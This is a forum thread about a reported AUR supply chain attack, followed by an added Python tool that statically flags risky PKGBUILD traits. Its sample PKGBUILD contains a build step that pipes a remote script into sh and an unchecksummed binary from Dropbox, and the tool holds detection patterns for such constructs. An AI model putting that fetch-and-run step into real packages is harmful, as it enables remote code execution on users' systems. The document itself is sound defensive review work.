A massive supply chain attack targeting the Arch User Repository (AUR) has compromised more than 400 community-maintained packages, with attackers injecting malicious build scripts designed to deploy credential-stealing malware and rootkit-style payloads on affected Linux systems.
Been saying for years that people need to stop treating the AUR like a repo, when it’s more akin to curl installscript.sh | bash.

So, better to use a safe language, and use
(I copied that from https://rust-lang.org/tools/install/ just a second ago…)
cue RuSt Is ThE fUtUrE people.
But it is a repo. It’s just an unofficial one. I don’t know how you use it without understanding this. It’s not far from perfect, but it is useful.
The problem is exactly the fact that it is a repo; it introduces a layer of unknown between the dev and the user. And the user will unavoidably “trust” it (especially when it’s listed amongst official repos in e.g. the graphical version of Pamac), without understanding the risks.
Some packages pull files from personal Dropbox…
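The thread's point is that a PKGBUILD is a shell script you are about to execute, and that its source array can point anywhere, a personal Dropbox included. The script below is an added example written for this thread, not Arch or AUR tooling and not code posted by any commenter. It triages a PKGBUILD statically, without sourcing it (sourcing one runs it, which is the whole problem), and flags the things a reviewer would want to read before running makepkg: remote files with checksum SKIP, sources on file-sharing hosts or unfamiliar hosts, VCS sources not pinned to a commit or tag, an .install hook, and a download piped into a shell. The host lists and the sample PKGBUILD are constructed assumptions for illustration.

```python
"""Static triage of an AUR PKGBUILD before it is handed to makepkg.
Added example for this thread, not Arch/AUR tooling. Nothing here executes
the PKGBUILD; host lists and the sample below are constructed assumptions."""
import re
import shlex
from urllib.parse import urlparse

# Assumption: hosts a reviewer would normally expect upstream sources from.
EXPECTED_HOSTS = {"github.com", "gitlab.com", "codeberg.org", "sourceforge.net",
                  "pypi.org", "files.pythonhosted.org", "crates.io"}
# Assumption: consumer file-sharing hosts that deserve a hard look.
FILE_SHARING_HOSTS = {"dropbox.com", "dropboxusercontent.com", "drive.google.com",
                      "docs.google.com", "mega.nz", "mediafire.com"}
CHECKSUM_ARRAYS = ("b2sums", "sha512sums", "sha256sums", "sha1sums", "md5sums", "cksums")
VCS_PREFIXES = ("git+", "hg+", "svn+", "bzr+")

_SCALAR_RE = re.compile(r'^(\w+)=(["\']?)([^\n()]*?)\2[ \t]*$', re.M)
_ARRAY_RE = re.compile(r'^(\w+)=\((.*?)\)', re.M | re.S)   # first ')' closes; no nested parens
_PIPE_TO_SHELL_RE = re.compile(r'\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b')
_DECODE_EXEC_RE = re.compile(r'base64\s+(?:-d|--decode)\b|\beval\b|\bxxd\s+-r\b')


def _expand(s, scalars):
    """Substitute $name / ${name} from the PKGBUILD's own scalar assignments."""
    return re.sub(r'\$\{(\w+)\}|\$(\w+)',
                  lambda m: scalars.get(m.group(1) or m.group(2), m.group(0)), s)


def _host_matches(host, hosts):
    return any(host == h or host.endswith("." + h) for h in hosts)


def parse_pkgbuild(text):
    """Return (scalars, arrays) by pattern matching only; nothing is executed."""
    scalars = {m.group(1): m.group(3) for m in _SCALAR_RE.finditer(text)}
    arrays = {m.group(1): [_expand(x, scalars) for x in shlex.split(m.group(2), comments=True)]
              for m in _ARRAY_RE.finditer(text)}
    return scalars, arrays


def triage_pkgbuild(text):
    """Return (severity, message) findings a reviewer should read before building."""
    findings = []
    scalars, arrays = parse_pkgbuild(text)
    sources = arrays.get("source", [])
    sums = next((arrays[k] for k in CHECKSUM_ARRAYS if k in arrays), [])
    if sources and not sums:
        findings.append(("HIGH", "no checksum array at all"))
    elif sums and len(sums) != len(sources):
        findings.append(("HIGH", f"{len(sources)} sources but {len(sums)} checksums"))
    if "install" in scalars:
        findings.append(("INFO", f"install script {scalars['install']} runs as root at install time"))
    for i, entry in enumerate(sources):
        url = entry.rsplit("::", 1)[-1]            # "localname::url" form
        csum = sums[i].upper() if i < len(sums) else "SKIP"
        if "://" not in url:                        # file shipped in the AUR git repo itself
            if csum == "SKIP":
                findings.append(("MEDIUM", f"source[{i}] local file {url} not checksummed; read it"))
            continue
        is_vcs = url.startswith(VCS_PREFIXES)
        parsed = urlparse(url.split("+", 1)[1] if is_vcs else url)
        host = (parsed.hostname or "").lower()
        if parsed.scheme in ("http", "ftp"):
            findings.append(("MEDIUM", f"source[{i}] fetched over {parsed.scheme}; checksum is the only integrity control"))
        if _host_matches(host, FILE_SHARING_HOSTS):
            findings.append(("HIGH", f"source[{i}] pulled from file-sharing host {host}"))
        elif not _host_matches(host, EXPECTED_HOSTS):
            findings.append(("INFO", f"source[{i}] from unfamiliar host {host}"))
        if is_vcs:
            if not re.search(r'#(?:commit|tag)=', url):
                findings.append(("MEDIUM", f"source[{i}] VCS checkout not pinned to a commit or tag"))
        elif csum == "SKIP":
            findings.append(("HIGH", f"source[{i}] remote file with checksum SKIP: {url}"))
    for m in _PIPE_TO_SHELL_RE.finditer(text):
        findings.append(("HIGH", f"download piped straight into a shell: {m.group(0).strip()}"))
    for m in _DECODE_EXEC_RE.finditer(text):
        findings.append(("MEDIUM", f"decode/eval construct worth reading closely: {m.group(0)}"))
    return findings


def severity_counts(findings):
    counts = {"HIGH": 0, "MEDIUM": 0, "INFO": 0}
    for sev, _ in findings:
        counts[sev] += 1
    return counts


# Constructed sample PKGBUILD (not a real AUR package) exercising each check.
SAMPLE_PKGBUILD = """\
pkgname=examplepkg
pkgver=1.4.2
pkgrel=1
arch=('x86_64')
install=examplepkg.install
source=("https://github.com/example/examplepkg/archive/v${pkgver}.tar.gz"
        "helper.bin::https://www.dropbox.com/s/abc123/helper.bin?dl=1"
        "git+https://github.com/example/plugins.git"
        "fix-build.patch")
sha256sums=('3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b' 'SKIP' 'SKIP' 'SKIP')

build() {
  cd "$pkgname-$pkgver"
  curl -fsSL https://example.net/setup.sh | sh
  make
}
"""

if __name__ == "__main__":
    for sev, msg in triage_pkgbuild(SAMPLE_PKGBUILD):
        print(f"[{sev}] {msg}")
```

Run it against a cloned AUR package directory with `triage_pkgbuild(open("PKGBUILD").read())` before building; anything it reports is a reason to read the PKGBUILD and any .install file yourself. It is a reading aid, not a verdict: a clean report only means none of these heuristics fired, and the pattern matching deliberately does not evaluate shell, so obfuscated scripts can slip past it while a plain `diff` against the previous commit of the package often reveals more.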